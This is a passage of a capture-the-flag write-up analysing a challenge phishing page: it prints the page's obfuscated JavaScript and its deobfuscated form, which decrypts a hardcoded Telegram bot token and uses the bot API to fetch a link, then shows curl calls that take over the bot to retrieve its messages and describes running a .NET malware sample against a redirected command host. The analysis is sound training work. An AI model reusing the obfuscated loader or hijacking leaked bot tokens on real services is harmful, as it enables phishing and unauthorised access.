Z89zPMBOTjYpVREXXKYX82SoaOv04bwvGvl8QjOU7XSVcYZUkA+XorsnBIs1eoLxldAYIvoDxqgjCG8Kjsoonej6+Y1aCSYqv1/lkvrVElgslW/H2wTa6oQv+yyuakphmiPN0YXAQ4MYhDF9In9RZ8mXD9cJ/O/nMlmfltDFtoPl3BlDw==")
}, CryptoJS["enc"]["Base64"]["parse"]("2+2YbLGJoUeV8oqzF69MLbIHNynPVLyT"), {
  iv: CryptoJS["enc"]["Base64"]["parse"]("5HUmFMpKNy84CfzGDQkwig==")
}).toString(CryptoJS["enc"]["Utf8"]));

The second payload seems to be another heavily obfuscated Javascript.

1
var _$_8b18 = (function (k, j) { var y = k.length; var o = []; for (var m = 0; m < y; m++) { o[m] = k.charAt(m) }; for (var m = 0; m < y; m++) { var b = j * (m + 143) + (j % 34726); var r = j * (m + 91) + (j % 23714); var v = b % y; var s = r % y; var f = o[v]; o[v] = o[s]; o[s] = f; j = (b + r) % 4449625 }; var a = String.fromCharCode(127); var i = ''; var e = '\x25'; var q = '\x23\x31'; var t = '\x25'; var h = '\x23\x30'; var w = '\x23'; return o.join(i).split(e).join(a).split(q).join(t).split(h).join(w).split(a) })('shfnemBLlerpitrtgt%ld%DmvuFeceaEaladerletdtdtsputpnielEvae%%iansn%eimkei%guLt%d%i%tsv%ds%eltee%ewssmnnvdsaiyrroeesmlc@Feroieoel%bt%lIota', 3827531); document[_$_8b18[3]](_$_8b18[14])[_$_8b18[13]](_$_8b18[0], function (e) { e[_$_8b18[1]](); const emailField = document[_$_8b18[3]](_$_8b18[2]); const descriptionField = document[_$_8b18[3]](_$_8b18[4]); let isValid = true; if (!emailField[_$_8b18[5]]) { emailField[_$_8b18[8]][_$_8b18[7]](_$_8b18[6]); isValid = false; setTimeout(() => { return emailField[_$_8b18[8]][_$_8b18[9]](_$_8b18[6]) }, 500) }; if (!isValid) { return }; const emailValue = emailField[_$_8b18[5]]; const specialKey = emailValue[_$_8b18[11]](_$_8b18[10])[0]; const desc = parseInt(descriptionField[_$_8b18[5]], 10); f(specialKey, desc) });;function G(r) { return function () { var r = Array.prototype.slice.call(arguments), o = r.shift(); return r.reverse().map(function (r, t) { return String.fromCharCode(r - o - 7 - t) }).join('') }(43, 106, 167, 103, 163, 98) + 1354343..toString(36).toLowerCase() + 21..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -13) }).join('') + 4..toString(36).toLowerCase() + 32..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -39) }).join('') + 381..toString(36).toLowerCase().split('').map(function (r) { return String.fromCharCode(r.charCodeAt() + -13) }).join('') + function () { var r = Array.prototype.slice.call(arguments), o = r.shift(); return r.reverse().map(function (r, t) { return String.fromCharCode(r - o - 60 - t) }).join('') }(42, 216, 153, 153, 213, 187) };var _$_5975 = (function (o, u) { var g = o.length; var t = []; for (var w = 0; w < g; w++) { t[w] = o.charAt(w) }; for (var w = 0; w < g; w++) { var z = u * (w + 340) + (u % 19375); var a = u * (w + 556) + (u % 18726); var h = z % g; var q = a % g; var b = t[h]; t[h] = t[q]; t[q] = b; u = (z + a) % 5939310 }; var k = String.fromCharCode(127); var r = ''; var l = '\x25'; var i = '\x23\x31'; var v = '\x25'; var e = '\x23\x30'; var f = '\x23'; return t.join(r).split(l).join(k).split(i).join(v).split(e).join(f).split(k) })('%dimfT%mVlzx%degpatf5bfnrG%6tSiqth5at%easpi0emILmcim%e%/!=eZtnHf%e7cf+3rstO%%.D0i8p3t/Sphryoa%IL0rin%rcAeF6%nsenoYaLeQ5Natp4CrSrCGttUtZrdG%rlxe2poa2rdg=9fQs%&j_of0ButCO tb=r35DyCee8tgaCf=I=%rAQa4fe%ar0aonsGT_v/NgoPouP2%eoe%ue3tl&enTceynCtt4FBs%s/rBsAUEhradnkrstfgd?%t%xeyhcedeTo%olghXMsaocrB3aaDBr5rRa16Cjuct%cOee5lWE_ooo+Ka4%d3TysnehshstepId%%Ieoaycug:i_m=%%mjp0tgaiidoei.prn%sw1d', 4129280); function f(oferkfer, icd) { const channel_id = -1002496072246; var enc_token = _$_5975[0]; if (oferkfer === G(_$_5975[1]) && CryptoJS[_$_5975[7]](sequence[_$_5975[6]](_$_5975[5]))[_$_5975[4]](CryptoJS[_$_5975[3]][_$_5975[2]]) === _$_5975[8]) { var decrypted = CryptoJS[_$_5975[12]][_$_5975[11]](enc_token, CryptoJS[_$_5975[3]][_$_5975[9]][_$_5975[10]](oferkfer), { drop: 192 })[_$_5975[4]](CryptoJS[_$_5975[3]][_$_5975[9]]); var HOST = _$_5975[13] + String[_$_5975[14]](0x2f) + String[_$_5975[14]](0x62) + String[_$_5975[14]](0x6f) + String[_$_5975[14]](0x74) + decrypted; var xhr = new XMLHttpRequest(); xhr[_$_5975[15]] = function () { if (xhr[_$_5975[16]] == XMLHttpRequest[_$_5975[17]]) { const resp = JSON[_$_5975[10]](xhr[_$_5975[18]]); try { const link = resp[_$_5975[20]][_$_5975[19]]; window[_$_5975[23]][_$_5975[22]](link) } catch (error) { alert(_$_5975[24]) } } }; xhr[_$_5975[29]](_$_5975[25], HOST + String[_$_5975[14]](0x2f) + _$_5975[26] + icd + _$_5975[27] + channel_id + _$_5975[28]); xhr[_$_5975[30]](null) } else { alert(_$_5975[24]) } };;var sequence = [];;function l() { sequence.push(this.id); };;var _$_ead6 = ['\x69\x6E\x70\x75\x74\x5B\x63\x6C\x61\x73\x73\x3D\x63\x62\x5D', '\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C', '\x6C\x65\x6E\x67\x74\x68', '\x63\x68\x61\x6E\x67\x65', '\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72']; var checkboxes = document[_$_ead6[1]](_$_ead6[0]); for (var i = 0; i < checkboxes[_$_ead6[2]]; i++) { checkboxes[i][_$_ead6[4]](_$_ead6[3], l) }

Similarly, it can be deobfuscated with deobfuscate.io and some manual work. Skimming through the deobfuscated JavaScript, we can see that it is a generic function that involves sending requests to a Telegram bot. Fortunately, the bot token and encryption key was also hardcoded in the JavaScript.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
document.getElementById("newsletterForm").addEventListener("submit", function(e) {
  e.preventDefault();
  const emailField = document.getElementById("email");
  const descriptionField = document.getElementById("descriptionField");
  let isValid = true;
  if (!emailField.value) {
    emailField.classList.add("shake");
    isValid = false;
    setTimeout(() => {
      return emailField.classList.remove("shake");
    }, 500);
  }
  if (!isValid) {
    return;
  }
  const emailValue = emailField.value;
  const specialKey = emailValue.split("@")[0];
  const desc = parseInt(descriptionField.value, 10);
  f(specialKey, desc);
});

function f(oferkfer, icd) {
  const channel_id = -1002496072246;
  var enc_token = "nZiIj...[REDACTED]...Z0Q==";
  if (oferkfer === "0p3r4t10n_4PT_Un10n" && CryptoJS.SHA256(sequence.join("")).toString(CryptoJS.enc.Base64) === "18m0oThLAr5NfLP4hTycCGf0BIu0dG+P/1xvnW6O29g=") {
    var decrypted = CryptoJS.RC4Drop.decrypt(enc_token, CryptoJS.enc.Utf8.parse(oferkfer), {
      drop: 192
    }).toString(CryptoJS.enc.Utf8);
    var HOST = "https://api.telegram.org" + "/" + "b" + "o" + "t" + decrypted;
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState == XMLHttpRequest.DONE) {
        const resp = JSON.parse(xhr.responseText);
        try {
          const link = resp.result.text;
          window.location.replace(link);
        } catch (error) {
          alert("Form submitted!");
        }
      }
    };
    xhr.open("GET", HOST + "/" + "forwardMessage?chat_id=" + icd + "&from_chat_id=" + channel_id + "&message_id=5");
    xhr.send(null);
  } else {
    alert("Form submitted!");
  }
}
var sequence = [];

function l() {
  sequence.push(this.id);
}
var checkboxes = document.querySelectorAll("input[class=cb]");
for (var i = 0; i < checkboxes.length; i++) {
  checkboxes[i].addEventListener("change", l);
}

After decrypting the bot token, we can use it to interact with the Telegram bot using specific Telegram APIs. Using the getMe API, the name of the Telegram bot can be identified as OperationEldoriaBot.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
const CryptoJS = require("./crypto-js");

function decryptToken(oferkfer) {
  var enc_token = "nZiIj...[REDACTED]...Z0Q==";
  var decrypted = CryptoJS.RC4Drop.decrypt(enc_token, CryptoJS.enc.Utf8.parse(oferkfer), {
    drop: 192
  }).toString(CryptoJS.enc.Utf8);
  console.log("Decrypted Token:", decrypted);
  return decrypted;
}

function debugDecryption() {
  const testKey = "0p3r4t10n_4PT_Un10n";
  decryptToken(testKey);
}

debugDecryption();
1
2
➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/getMe"
{"ok":true,"result":{"id":xxx,"is_bot":true,"first_name":"OperationEldoriaBot","username":"OperationEldoriaBot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}

We will then use the forwardMessage API to forward all the messages to our Telegran account. However, forwarding can only work if I have the chat ID between me and the Telegram bot. So, I can send a message to the Telegram bot and extract the chat ID using the getUpdates API.

pie20

1
2
3
4
5
➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/getUpdates"
{"ok":true,"result":[{"update_id":xxx,
"message":{"message_id":5635,"from":{"id":xxx,"is_bot":false,"first_name":"warlocksmurf","language_code":"en"},"chat":{"id":xxx,"first_name":"warlocksmurf","type":"private"},"date":1742737664,"text":"0p3r4t10n_4PT_Un10n"}}]}

➜ curl "https://api.telegram.org/bot<DECRYPTED-TOKEN>/forwardMessage?chat_id=xxx&from_chat_id=-1002496072246&message_id=1"

Incrementing the message_id starting from 1, we can see that there were a total of 11 messages forwarded from the bot, most of them mentioned something about a malware that specifically targets Brave browsers.

pie14

The malware can be identified to be a .NET native executable. Hence, we opt to dynamic analysis since we could not find a tool to statically analyze it.

pie15

Credits to @Vivi’s_Ghost for helping us out in dynamically analyzing the malware. Essentially, running the malware with Brave browser installed will show network traffic on the malware attempting to be resolve to zolsc2s65u.htb. Hence, by modifying /etc/hosts with the hostname and docker IP, we can ensure the malware actually resolves to zolsc2s65u.htb and perform the malicious action.

pie16

Once the hostname and docker IP was added, the malware can be seen sending a POST request with JSON data to a specific endpoint. However, the flag can instead be found in the JWT token within the POST request.

pie17

pie18

pie19

This post is licensed under CC BY 4.0 by the author.